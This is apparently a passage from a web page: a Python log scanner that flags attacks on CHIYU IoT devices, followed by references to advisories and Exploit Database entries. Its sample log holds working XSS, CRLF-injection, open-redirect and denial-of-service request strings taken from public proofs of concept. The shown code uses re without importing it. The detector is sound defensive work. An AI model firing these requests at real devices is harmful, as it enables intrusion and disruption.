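from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample of a proxy or syslog-forwarded access log for one of these
# devices. The request targets come from the PoCs on this page; everything else
# (client, timestamp, status, size) is made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2021:10:00:01 +0000] "GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply HTTP/1.1" 302 0
10.0.0.5 - - [01/Jun/2021:10:00:02 +0000] "GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&B_apply=APPLY HTTP/1.1" 302 0
10.0.0.5 - - [01/Jun/2021:10:00:03 +0000] "GET /if.cgi?redirect=http://192.168.187.201/exploit.htm&failure=fail.htm&type=serial_apply HTTP/1.1" 302 0
10.0.0.5 - - [01/Jun/2021:10:00:04 +0000] "GET /<script>alert(123)</script> HTTP/1.1" 404 512
10.0.0.5 - - [01/Jun/2021:10:00:05 +0000] "GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jun/2021:10:00:06 +0000] "GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=3 HTTP/1.1" 200 2048
"""

CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
HTML_TAG = re.compile(r"<\s*/?\s*[a-zA-Z]")              # start of an HTML tag
SCHEME_OR_HOST = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*:|//|\\\\)")
MAX_LOG_PAGE = 10000   # assumption: well above any real log page count on these devices


def findings_for_request(target: str, status: str) -> list:
    """Apply the rules to one request target (path + query) and its status code."""
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)   # values are URL-decoded here
    found = []
    for name, value in params:
        if name == "redirect":
            if re.search(r"[\r\n]", value):
                found.append("CRLF injection in redirect= (CVE-2021-31249)")
            if SCHEME_OR_HOST.match(value):
                found.append("open redirect in redirect= (CVE-2021-31252)")
        if HTML_TAG.search(value):
            found.append("HTML/script in %s= (XSS, CVE-2021-31250/CVE-2021-31643)" % name)
        if name == "page" and url.path.endswith("if.cgi"):
            if not value.isdigit() or int(value) > MAX_LOG_PAGE:
                found.append("out-of-range page= on if.cgi (DoS, CVE-2021-31642)")
    if status == "404" and HTML_TAG.search(unquote(url.path)):
        found.append("HTML/script in unknown path (reflected XSS on 404, CVE-2021-31641)")
    return found


def scan_log(text: str) -> list:
    """Return (client, request target, finding) tuples for every line that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        for finding in findings_for_request(target, status):
            hits.append((client, target, finding))
    return hits


if __name__ == "__main__":
    for client, target, finding in scan_log(SAMPLE_LOG):
        print("%s %s <- %s" % (client, finding, target[:60]))
```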

References

Solve CVE-2021-31251 for BF-430/ BF-431/ BF-450M/ SEMAC
Dancing in the IoT: CHIYU devices vulnerable to remote attacks (Segurança Informática)
CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) (Exploit Database)
CHIYU TCP/IP Converter devices - CRLF injection (Exploit Database)
CHIYU IoT Devices - 'Telnet' Authentication Bypass (Exploit Database)
CHIYU IoT Devices - Denial of Service (DoS) (Exploit Database)